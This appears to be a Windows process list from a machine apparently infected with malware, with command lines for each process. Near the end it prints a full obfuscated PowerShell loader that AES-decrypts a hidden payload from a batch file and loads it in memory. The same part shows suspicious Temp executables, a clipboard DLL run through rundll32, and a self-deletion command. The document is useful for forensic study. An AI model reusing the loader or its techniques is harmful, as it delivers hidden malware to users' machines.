Process List

The document lists process information from a system, including the process ID, name, and command line. It includes common system processes like csrss.exe, winlogon.exe, and explorer.exe as well as applications like RiotClientServices.exe, AdobeIPCBroker.exe, and TotalCMD.exe. A variety of other processes are also referenced, indicating it is summarizing process information from an active system.

Uploaded by matheus23kayna

ID: 912, Name: csrss.exe, CommandLine:
===============
ID: 1172, Name: winlogon.exe, CommandLine:
===============
ID: 1228, Name: fontdrvhost.exe, CommandLine:
===============
ID: 1300, Name: dwm.exe, CommandLine:
===============
ID: 2644, Name: atieclxx.exe, CommandLine:
===============
ID: 7072, Name: sihost.exe, CommandLine: sihost.exe
===============
ID: 6544, Name: svchost.exe, CommandLine: C:\Windows\system32\svchost.exe -k
UnistackSvcGroup -s CDPUserSvc
===============
ID: 6924, Name: svchost.exe, CommandLine: C:\Windows\system32\svchost.exe -k
UnistackSvcGroup -s WpnUserService
===============
ID: 6868, Name: AsusDownLoadLicense.exe, CommandLine: C:\Windows\system32\
AsusDownLoadLicense.exe -asus2357start -hide
===============
ID: 3664, Name: taskhostw.exe, CommandLine: taskhostw.exe {222A245B-E637-4AE9-A93F-
A59CA119A75E}
===============
ID: 7432, Name: ctfmon.exe, CommandLine:
===============
ID: 7688, Name: explorer.exe, CommandLine: C:\Windows\Explorer.EXE
===============
ID: 7952, Name: svchost.exe, CommandLine: C:\Windows\system32\svchost.exe -k
ClipboardSvcGroup -p -s cbdhsvc
===============
ID: 8208, Name: StartMenuExperienceHost.exe, CommandLine: "C:\Windows\SystemApps\
Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\
StartMenuExperienceHost.exe" -
ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
===============
ID: 8432, Name: RuntimeBroker.exe, CommandLine: C:\Windows\System32\
RuntimeBroker.exe -Embedding
===============
ID: 8636, Name: SearchApp.exe, CommandLine: "C:\Windows\SystemApps\
Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -
ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
===============
ID: 8764, Name: RuntimeBroker.exe, CommandLine: C:\Windows\System32\
RuntimeBroker.exe -Embedding
===============
ID: 9992, Name: PhoneExperienceHost.exe, CommandLine: "C:\Program Files\
WindowsApps\Microsoft.YourPhone_1.23112.87.0_x64__8wekyb3d8bbwe\
PhoneExperienceHost.exe" -ComServer:Background -Embedding
===============
ID: 9468, Name: RuntimeBroker.exe, CommandLine: C:\Windows\System32\
RuntimeBroker.exe -Embedding
===============
ID: 10340, Name: RuntimeBroker.exe, CommandLine: C:\Windows\System32\
RuntimeBroker.exe -Embedding
===============
ID: 10888, Name: TextInputHost.exe, CommandLine: "C:\Windows\SystemApps\
MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -
ServerName:InputApp.AppXjd5de1g66v206tj52m9d0dtpppx4cgpn.mca
===============
ID: 11332, Name: SecurityHealthSystray.exe, CommandLine: "C:\Windows\System32\
SecurityHealthSystray.exe"
===============
ID: 11484, Name: tvnserver.exe, CommandLine: "C:\Program Files\TightVNC\
tvnserver.exe" -controlservice -slave
===============
ID: 11544, Name: AvastUI.exe, CommandLine: AvastUI.exe /nogui
===============
ID: 11568, Name: vgtray.exe, CommandLine: "C:\Program Files\Riot Vanguard\
vgtray.exe"
===============
ID: 11616, Name: OneDrive.exe, CommandLine: "C:\Users\User\AppData\Local\Microsoft\
OneDrive\OneDrive.exe" /background
===============
ID: 12032, Name: CCXProcess.exe, CommandLine: "C:\Program Files (x86)\Adobe\Adobe
Creative Cloud Experience\CCXProcess.exe"
===============
ID: 12048, Name: node.exe, CommandLine: "C:\Program Files (x86)\Adobe\Adobe
Creative Cloud Experience\libs\node.exe" "C:\Program Files (x86)\Adobe\Adobe
Creative Cloud Experience\js\main.js"
===============
ID: 12056, Name: conhost.exe, CommandLine: \??\C:\Windows\system32\conhost.exe 0x4
===============
ID: 12132, Name: RiotClientServices.exe, CommandLine: "C:\Riot Games\Riot Client\
RiotClientServices.exe" --launch-background-mode
===============
ID: 12236, Name: AdobeIPCBroker.exe, CommandLine: "C:\Program Files (x86)\Common
Files\Adobe\Adobe Desktop Common\IPCBox\AdobeIPCBroker.exe" "-launchedbyvulcan-
12048 C:\Program Files (x86)\Adobe\Adobe Creative Cloud Experience\libs\node.exe"
===============
ID: 1576, Name: RiotClientCrashHandler.exe, CommandLine: "C:\Riot Games\Riot
Client\RiotClientCrashHandler.exe" --no-rate-limit "--attachment=2024-01-28T23-18-
08_12132_Riot_Client.0.log=C:/Users/User/AppData/Local/Riot Games/Riot
Client/Logs/Riot Client Logs/2024-01-28T23-18-08_12132_Riot Client.0.log" "--
attachment=2024-01-28T23-18-08_12132_Riot_Client.log=C:/Users/User/AppData/Local/
Riot Games/Riot Client/Logs/Riot Client Logs/2024-01-28T23-18-08_12132_Riot
Client.log" "--attachment=__sentry-breadcrumb1=C:\Users\User\AppData\Local\Riot
Games\Riot Client\Crashes\Riot Client\db9afdf1-c7b1-4eb8-8410-376224f92530.run\
__sentry-breadcrumb1" "--attachment=__sentry-breadcrumb2=C:\Users\User\AppData\
Local\Riot Games\Riot Client\Crashes\Riot Client\db9afdf1-c7b1-4eb8-8410-
376224f92530.run\__sentry-breadcrumb2" "--attachment=__sentry-event=C:\Users\User\
AppData\Local\Riot Games\Riot Client\Crashes\Riot Client\db9afdf1-c7b1-4eb8-8410-
376224f92530.run\__sentry-event" "--database=C:\Users\User\AppData\Local\Riot
Games\Riot Client\Crashes\Riot Client" "--metrics-dir=C:\Users\User\AppData\Local\
Riot Games\Riot Client\Crashes\Riot Client"
--url=https://sentry.io:443/api/1339107/minidump/?
sentry_key=dc54709324504ab18ddf517a83f99e1a --initial-client-
data=0x378,0x3f8,0x3c8,0x384,0x3e0,0x6f64ed88,0x6f64ed98,0x6f64eda8
===============
ID: 12968, Name: TokenUtil.exe, CommandLine: "C:\Program Files\TrustEdgeID\
TokenUtil.exe"
===============
ID: 13048, Name: jusched.exe, CommandLine: "C:\Program Files (x86)\Common Files\
Java\Java Update\jusched.exe"
===============
ID: 13108, Name: NativeInstrumentsUsbAudioCpl.exe, CommandLine: "C:\Program Files\
Native Instruments\Komplete Audio Driver\W10_x64\NativeInstrumentsUsbAudioCpl.exe"
-hide
===============
ID: 13220, Name: RadeonSoftware.exe, CommandLine: "C:\Program Files\AMD\CNext\
CNext\Radeonsoftware.exe" atlogon
===============
ID: 4892, Name: cncmd.exe, CommandLine: "C:\Program Files\AMD\CNext\CNext\
cncmd.exe" watch 13220
===============
ID: 12700, Name: AMDRSServ.exe, CommandLine:
===============
ID: 7664, Name: amdow.exe, CommandLine:
===============
ID: 1188, Name: MSOSYNC.EXE, CommandLine: "C:\Program Files\Microsoft Office\
Office15\MsoSync.exe"
===============
ID: 2860, Name: ApplicationFrameHost.exe, CommandLine: C:\Windows\system32\
ApplicationFrameHost.exe -Embedding
===============
ID: 11460, Name: Microsoft.Media.Player.exe, CommandLine: "C:\Program Files\
WindowsApps\Microsoft.ZuneMusic_11.2312.7.0_x64__8wekyb3d8bbwe\
Microsoft.Media.Player.exe" -
ServerName:Microsoft.ZuneMusic.AppXr954g6gg1tvs748d5g67zt981dvpmnr6.mca
===============
ID: 8372, Name: RuntimeBroker.exe, CommandLine: C:\Windows\System32\
RuntimeBroker.exe -Embedding
===============
ID: 9348, Name: svchost.exe, CommandLine: C:\Windows\System32\svchost.exe -k
UnistackSvcGroup
===============
ID: 12828, Name: dllhost.exe, CommandLine: C:\Windows\system32\DllHost.exe
/Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
===============
ID: 10116, Name: jucheck.exe, CommandLine: "C:\Program Files (x86)\Common Files\
Java\Java Update\jucheck.exe" -auto
===============
ID: 13648, Name: QtWebEngineProcess.exe, CommandLine: "C:\Program Files\AMD\CNext\
CNext\QtWebEngineProcess.exe" --type=utility --enable-
features=AllowContentInitiatedDataUrlNavigations,TracingServiceInProcess --disable-
features=BackgroundFetch,ConsolidatedMovementXY,DnsOverHttpsUpgrade,FormControlsRef
resh,MojoVideoCapture,PictureInPicture,SmsReceiver,UseSkiaRenderer,WebPayments,WebU
SB --lang=sr --service-sandbox-type=network --use-gl=angle --application-
name=Radeonsoftware --webengine-schemes=qrc:sLV --mojo-platform-channel-handle=5208
/prefetch:8
===============
ID: 4216, Name: AMDRSSrcExt.exe, CommandLine: "C:\Program Files\AMD\CNext\CNext\
AMDRSSrcExt.exe" fb28e830-7c29-4591-b2df-4e16275fa0d9 SOFTWARE\AMD\DVR\Overlays
===============
ID: 8616, Name: smartscreen.exe, CommandLine: C:\Windows\System32\smartscreen.exe -
Embedding
===============
ID: 9880, Name: TOTALCMD.EXE, CommandLine: "E:\Instalacije\Totalcmd\TOTALCMD.EXE"
===============
ID: 5152, Name: AvastUI.exe, CommandLine: "C:\Program Files\Avast Software\Avast\
AvastUI.exe" --type=gpu-process --field-trial-
handle=8360,3878373468549405587,10135637355546976036,131072 --disable-
features=CookiesWithoutSameSiteMustBeSecure,ForcedColors,SameSiteByDefaultCookies,S
ameSiteDefaultChecksMethodRigorously --no-sandbox --disable-gpu-driver-bug-
workarounds --log-file="C:\Users\User\AppData\Roaming\Avast Software\Avast\log\
cef_log.txt" --log-severity=error --user-agent="Mozilla/5.0 AppleWebKit/537.36
(KHTML, like Gecko) Chrome/72.3.3626.1895 Safari/537.36 Avastium (0.0.0) (Windows
10.0)" --lang=sr-Latn-RS --proxy-auto-detect --disable-webaudio --force-wave-audio
--disable-software-rasterizer --no-sandbox --blacklist-accelerated-compositing --
disable-accelerated-2d-canvas --disable-accelerated-compositing --disable-
accelerated-layers --disable-accelerated-video-decode --blacklist-webgl --disable-
bundled-ppapi-flash --disable-flash-3d --enable-aggressive-domstorage-flushing --
enable-media-stream --disable-gpu --disable-webgl --disable-gpu-compositing --
allow-file-access-from-files=1 --pack_loading_disabled=1 --gpu-
preferences=SAAAAAAAAADgAABwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAA
AAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIA
AAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --log-file="C:\Users\User\AppData\
Roaming\Avast Software\Avast\log\cef_log.txt" --mojo-platform-channel-
handle=8416 /prefetch:2
===============
ID: 4712, Name: AvastUI.exe, CommandLine: "C:\Program Files\Avast Software\Avast\
AvastUI.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --
field-trial-handle=8360,3878373468549405587,10135637355546976036,131072 --disable-
features=CookiesWithoutSameSiteMustBeSecure,ForcedColors,SameSiteByDefaultCookies,S
ameSiteDefaultChecksMethodRigorously --lang=sr --service-sandbox-type=utility --no-
sandbox --force-wave-audio --log-file="C:\Users\User\AppData\Roaming\Avast
Software\Avast\log\cef_log.txt" --log-severity=error --user-agent="Mozilla/5.0
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.3.3626.1895 Safari/537.36 Avastium
(0.0.0) (Windows 10.0)" --lang=sr-Latn-RS --proxy-auto-detect --disable-webaudio --
force-wave-audio --disable-software-rasterizer --no-sandbox --blacklist-
accelerated-compositing --disable-accelerated-2d-canvas --disable-accelerated-
compositing --disable-accelerated-layers --disable-accelerated-video-decode --
blacklist-webgl --disable-bundled-ppapi-flash --disable-flash-3d --enable-
aggressive-domstorage-flushing --enable-media-stream --disable-gpu --disable-webgl
--disable-gpu-compositing --allow-file-access-from-files=1 --
pack_loading_disabled=1 --log-file="C:\Users\User\AppData\Roaming\Avast Software\
Avast\log\cef_log.txt" --mojo-platform-channel-handle=8608 /prefetch:8
===============
ID: 12392, Name: AvastUI.exe, CommandLine: "C:\Program Files\Avast Software\Avast\
AvastUI.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --
field-trial-handle=8360,3878373468549405587,10135637355546976036,131072 --disable-
features=CookiesWithoutSameSiteMustBeSecure,ForcedColors,SameSiteByDefaultCookies,S
ameSiteDefaultChecksMethodRigorously --lang=sr --service-sandbox-type=none --no-
sandbox --force-wave-audio --log-file="C:\Users\User\AppData\Roaming\Avast
Software\Avast\log\cef_log.txt" --log-severity=error --user-agent="Mozilla/5.0
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.3.3626.1895 Safari/537.36 Avastium
(0.0.0) (Windows 10.0)" --lang=sr-Latn-RS --proxy-auto-detect --disable-webaudio --
force-wave-audio --disable-software-rasterizer --no-sandbox --blacklist-
accelerated-compositing --disable-accelerated-2d-canvas --disable-accelerated-
compositing --disable-accelerated-layers --disable-accelerated-video-decode --
blacklist-webgl --disable-bundled-ppapi-flash --disable-flash-3d --enable-
aggressive-domstorage-flushing --enable-media-stream --disable-gpu --disable-webgl
--disable-gpu-compositing --allow-file-access-from-files=1 --
pack_loading_disabled=1 --log-file="C:\Users\User\AppData\Roaming\Avast Software\
Avast\log\cef_log.txt" --mojo-platform-channel-handle=8660 /prefetch:8
===============
ID: 9868, Name: AvastUI.exe, CommandLine: "C:\Program Files\Avast Software\Avast\
AvastUI.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-
trial-handle=8360,3878373468549405587,10135637355546976036,131072 --disable-
features=CookiesWithoutSameSiteMustBeSecure,ForcedColors,SameSiteByDefaultCookies,S
ameSiteDefaultChecksMethodRigorously --lang=sr --service-sandbox-type=audio --no-
sandbox --force-wave-audio --log-file="C:\Users\User\AppData\Roaming\Avast
Software\Avast\log\cef_log.txt" --log-severity=error --user-agent="Mozilla/5.0
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.3.3626.1895 Safari/537.36 Avastium
(0.0.0) (Windows 10.0)" --lang=sr-Latn-RS --proxy-auto-detect --disable-webaudio --
force-wave-audio --disable-software-rasterizer --no-sandbox --blacklist-
accelerated-compositing --disable-accelerated-2d-canvas --disable-accelerated-
compositing --disable-accelerated-layers --disable-accelerated-video-decode --
blacklist-webgl --disable-bundled-ppapi-flash --disable-flash-3d --enable-
aggressive-domstorage-flushing --enable-media-stream --disable-gpu --disable-webgl
--disable-gpu-compositing --allow-file-access-from-files=1 --
pack_loading_disabled=1 --log-file="C:\Users\User\AppData\Roaming\Avast Software\
Avast\log\cef_log.txt" --mojo-platform-channel-handle=10108 /prefetch:8
===============
ID: 12584, Name: ShellExperienceHost.exe, CommandLine: "C:\Windows\SystemApps\
ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe" -
ServerName:App.AppXtk181tbxbce2qsex02s8tw7hfxa9xb3t.mca
===============
ID: 5060, Name: RuntimeBroker.exe, CommandLine: C:\Windows\System32\
RuntimeBroker.exe -Embedding
===============
ID: 13356, Name: UserOOBEBroker.exe, CommandLine: C:\Windows\System32\oobe\
UserOOBEBroker.exe -Embedding
===============
ID: 7412, Name: AdobeCollabSync.exe, CommandLine: "C:\Program Files\Adobe\Acrobat
DC\Acrobat\AdobeCollabSync.exe"
===============
ID: 3508, Name: AdobeCollabSync.exe, CommandLine: "C:\Program Files\Adobe\Acrobat
DC\Acrobat\AdobeCollabSync.exe" --type=collab-renderer --proc=7412
===============
ID: 9876, Name: DPService.exe, CommandLine:
===============
ID: 13096, Name: 1FF3.exe, CommandLine: C:\Users\User\AppData\Local\Temp\1FF3.exe
===============
ID: 4120, Name: build2.exe, CommandLine: "C:\Users\User\AppData\Local\f4728982-
a5a0-4742-973b-67968a402246\build2.exe"
===============
ID: 11312, Name: 9883.exe, CommandLine: C:\Users\User\AppData\Local\Temp\9883.exe
===============
ID: 10264, Name: explorhe.exe, CommandLine: "C:\Users\User\AppData\Local\Temp\
d887ceb89d\explorhe.exe"
===============
ID: 13132, Name: RuntimeBroker.exe, CommandLine: C:\Windows\System32\
RuntimeBroker.exe -Embedding
===============
ID: 9576, Name: fz9YqoSLnCrtpx1uiHT8.exe, CommandLine: "C:\Users\User\AppData\
Local\Temp\jobA4aodo3bpwLTVri\fz9YqoSLnCrtpx1uiHT8.exe"
===============
ID: 12004, Name: CompPkgSrv.exe, CommandLine: C:\Windows\System32\CompPkgSrv.exe -
Embedding
===============
ID: 14608, Name: launcher.exe, CommandLine:
===============
ID: 14760, Name: opera_autoupdate.exe, CommandLine:
===============
ID: 14780, Name: opera_autoupdate.exe, CommandLine:
===============
ID: 11964, Name: btcgood.exe, CommandLine: "C:\Users\User\AppData\Local\Temp\
1000718001\btcgood.exe"
===============
ID: 3620, Name: 2024.exe, CommandLine: "C:\Users\User\AppData\Local\Temp\
1000721001\2024.exe"
===============
ID: 14900, Name: cmd.exe, CommandLine: C:\Windows\system32\cmd.exe /c C:\Users\
User\AppData\Local\Temp\file1.bat
===============
ID: 14928, Name: conhost.exe, CommandLine: \??\C:\Windows\system32\conhost.exe 0x4
===============
ID: 10204, Name: conhost.exe, CommandLine: C:\Windows\system32\conhost.exe
===============
ID: 11480, Name: conhost.exe, CommandLine: conhost.exe
===============
ID: 9708, Name: file1.bat.exe, CommandLine: "file1.bat.exe" -noprofile -
windowstyle hidden -ep bypass -command $_CASH_qaVPf = [System.IO.File]::
('txeTllAdaeR'[-1..-11] -join '')('C:\Users\User\AppData\Local\Temp\
file1.bat').Split([Environment]::NewLine);foreach ($_CASH_fIZHT in $_CASH_qaVPf)
{ if ($_CASH_fIZHT.StartsWith(':: @')) { $_CASH_XqEBS = $_CASH_fIZHT.Substring(4);
break; }; };$_CASH_XqEBS =
[System.Text.RegularExpressions.Regex]::Replace($_CASH_XqEBS, '_CASH_', '');
$_CASH_AbGjb = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')
($_CASH_XqEBS);$_CASH_xbtcQ = New-Object System.Security.Cryptography.AesManaged;
$_CASH_xbtcQ.Mode = [System.Security.Cryptography.CipherMode]::CBC;
$_CASH_xbtcQ.Padding =
[System.Security.Cryptography.PaddingMode]::PKCS7;$_CASH_xbtcQ.Key =
[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')
('xnU+qixX8GxmNdtUiuJWKTS5382DUH1RFgNRqJG+Kzg=');$_CASH_xbtcQ.IV =
[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')
('q4+6cHkazpcj3F4mKI+rYw==');$_CASH_KXHue = $_CASH_xbtcQ.CreateDecryptor();
$_CASH_AbGjb = $_CASH_KXHue.TransformFinalBlock($_CASH_AbGjb, 0,
$_CASH_AbGjb.Length);$_CASH_KXHue.Dispose();$_CASH_xbtcQ.Dispose();$_CASH_kEHGI =
New-Object System.IO.MemoryStream(, $_CASH_AbGjb);$_CASH_Kscdn = New-Object
System.IO.MemoryStream;$_CASH_Lfmtj = New-Object
System.IO.Compression.GZipStream($_CASH_kEHGI,
[IO.Compression.CompressionMode]::Decompress);$_CASH_Lfmtj.CopyTo($_CASH_Kscdn);
$_CASH_Lfmtj.Dispose();$_CASH_kEHGI.Dispose();$_CASH_Kscdn.Dispose();$_CASH_AbGjb =
$_CASH_Kscdn.ToArray();$_CASH_kHyYf = [System.Reflection.Assembly]::('daoL'[-1..-4]
-join '')($_CASH_AbGjb);$_CASH_ZMxsS = $_CASH_kHyYf.EntryPoint;
$_CASH_ZMxsS.Invoke($null, (, [string[]] ('')))
===============
ID: 3688, Name: rty25.exe, CommandLine: "C:\Users\User\AppData\Local\Temp\
rty25.exe"
===============
ID: 10724, Name: powershell.exe, CommandLine: C:\Windows\system32\
WindowsPowerShell\v1.0\powershell.exe Start-Process "C:\Users\User\AppData\Local\
Temp\FirstZ.exe" -Verb runAs
===============
ID: 1376, Name: conhost.exe, CommandLine: \??\C:\Windows\system32\conhost.exe 0x4
===============
ID: 9024, Name: consent.exe, CommandLine:
===============
ID: 13452, Name: RegAsm.exe, CommandLine: "C:\Windows\Microsoft.NET\Framework\
v4.0.30319\RegAsm.exe"
===============
ID: 13336, Name: explorer.exe, CommandLine: explorer.exe
===============
ID: 13392, Name: consent.exe, CommandLine:
===============
ID: 12588, Name: consent.exe, CommandLine:
===============
ID: 2208, Name: RegAsm.exe, CommandLine: "C:\Windows\Microsoft.NET\Framework\
v4.0.30319\RegAsm.exe"
===============
ID: 12296, Name: sadsadsadsa.exe, CommandLine: "C:\Users\User\AppData\Local\Temp\
1000726001\sadsadsadsa.exe"
===============
ID: 12448, Name: olehps.exe, CommandLine: "C:\Users\User\AppData\Roaming\
configurationValue\olehps.exe"
===============
ID: 9584, Name: RegAsm.exe, CommandLine: "C:\Windows\Microsoft.NET\Framework\
v4.0.30319\RegAsm.exe"
===============
ID: 7984, Name: RegAsm.exe, CommandLine: "C:\Windows\Microsoft.NET\Framework\
v4.0.30319\RegAsm.exe"
===============
ID: 3364, Name: 7b0d48dbbf50fe239f1097f5d01c2a6d.exe, CommandLine:
===============
ID: 4148, Name: RegAsm.exe, CommandLine: "C:\Windows\Microsoft.NET\Framework\
v4.0.30319\RegAsm.exe"
===============
ID: 10660, Name: LogonUI.exe, CommandLine:
===============
ID: 4636, Name: consent.exe, CommandLine:
===============
ID: 10740, Name: cmd.exe, CommandLine: C:\Windows\system32\cmd.exe /c choice /C
Y /N /D Y /T 3 & Del "C:\Users\User\AppData\Local\Temp\1000731001\moto.exe"
===============
ID: 11744, Name: conhost.exe, CommandLine: \??\C:\Windows\system32\conhost.exe 0x4
===============
ID: 11840, Name: rundll32.exe, CommandLine: "C:\Windows\System32\rundll32.exe" C:\
Users\User\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
===============
ID: 2000, Name: choice.exe, CommandLine: choice /C Y /N /D Y /T 3
===============
ID: 8036, Name: powershell.exe, CommandLine:
===============
ID: 3644, Name: conhost.exe, CommandLine:
===============
ID: 8668, Name: qemu-ga.exe, CommandLine: "C:\Users\User\AppData\Local\Temp\
d887ceb89d\qemu-ga.exe"
